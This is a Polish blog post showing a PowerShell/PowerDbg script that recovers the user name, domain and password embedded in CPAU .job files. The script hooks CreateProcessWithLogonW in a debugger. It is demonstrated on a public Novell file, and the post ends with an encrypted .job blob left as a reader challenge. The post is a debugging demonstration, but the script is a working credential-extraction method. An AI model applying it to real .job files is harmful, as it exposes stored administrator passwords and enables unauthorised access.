Zadanie: Wydłubać hasło z plików .job popularnego narzędzia typu runas - CPAU. Temat poruszałem już jakiś czas temu na blogu, teraz jednak sięgniemy po narzędzia pozwalające to i owo zautomatyzować.
Składniki:
CPAU
PowerDbg
Oczywiście Debugging Tools for Windows
Jesteśmy leniwi, nic odkrywczego. Z tego właśnie powodu powstają różne narzędzia usprawniające pracę. PowerDbg pozwala na automatyzację pracy z debuggerem przy wykorzystaniu dobrodziejstw PowerShella, dzięki czemu niektóre zadania są jeszcze prostsze, niż były do tej pory :)
Niech za przykład posłuży skrypt, który usprawnia proces wydobywania sekretów zaszytych w plikach .job:
#CPAUDecrypter - skrypt do wydłubywania hasełek z plików .job
param(
[string]$CPAUPath = 'c:\tools\cpau.exe',
[string]$JobFile = 'test.job'
)
$command = $CPAUPath + " -dec -file " + $JobFile
New-DbgSession -command $command | out-null
Send-DbgGo | out-null
Invoke-DbgCommand -command 'bp ADVAPI32!CreateProcessWithLogonW;g' | out-null
Invoke-DbgCommand -command 'kb' | out-null
Send-PowerDbgCommand 'dpu @esp+4 l3' | out-null
$stringReader = [System.IO.StringReader] $global:g_commandOutput
$i = 0
$keys = "User", "Domain", "Password"
while(($line = $stringReader.ReadLine()) -ne $null)
{
if($line -match "((^[0-9a-f]+)\s+[0-9a-f]+\s+(?<value>(.+)))")
{
Write-Host $keys[$i++]: $matches["value"]
}
}
Exit-DbgSession
#koniec
Nic dodać, nic ująć. Debuggowanie jeszcze nigdy nie było tak przyjemne :)
Do testu bierzemy publicznie dostępny plik zpminstall.job ze strony novella i sprawdzamy działanie naszego skrypciku:
User : "Administrator"
Domain : "TEST2000PRO"
Password : "support"
Jak się okazuje, powyższa metoda działa równie dobrze także w przypadku innych narzędzi tego typu i jako proste ćwiczenie pozostawiam modyfikację skryptu (a dokładniej zmiennej $command) i przygotowanie odpowiednika dla np. tego toola
A poniżej zadanie z wydłubywania tego i owego z sekretów CPAU dla moich najwierniejszych czytelników (ciekaw jestem, czy tacy jeszcze są ;))
Plik (znaki podziału są na potrzeby bloga, więc przy zapisie należy je usunąć):
365355271156227247262124E40C73B10F62B56C54D57B75E7
5E76C73E72E73C67F67D72D65105F67A61A61A60D61C56D63B
53E53100102A75C72F73C73A70C70F70C16B66F62E62B63D61
B57C56E57D54B53D77E75100101113A77E70A67B70D66105C6
6A63106E57B63F56C55F57C53102100E74B72B74F71D74D73C
67D66A70A65A66C62A61C56B60F57C56E55100C26101C73112
B76E72114D71F70107A66D64104C64A57102C60E60A73104E7
7121E77F76114E71D74E67C65A70E64C63C65C61B10D62D60B
77F57C77117F76E75114F73E71112D71D67106D63E63103D63
A60102A56A56C75101C77117A74C75114D71D71113F67E65C6
4D62B61100B57C61102A60D54117101102A75B73B75A71F73D
67C67E70C71E63B66D65C60E63A63E55
User ? Domain ? Password ?
Tylko plis, nie zdradzajcie wszystkich tajemnic i zostawcie coś dla innych :)